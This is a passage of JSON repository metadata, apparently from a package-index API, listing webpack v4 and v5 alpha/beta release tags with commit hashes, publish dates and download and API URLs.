ffa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.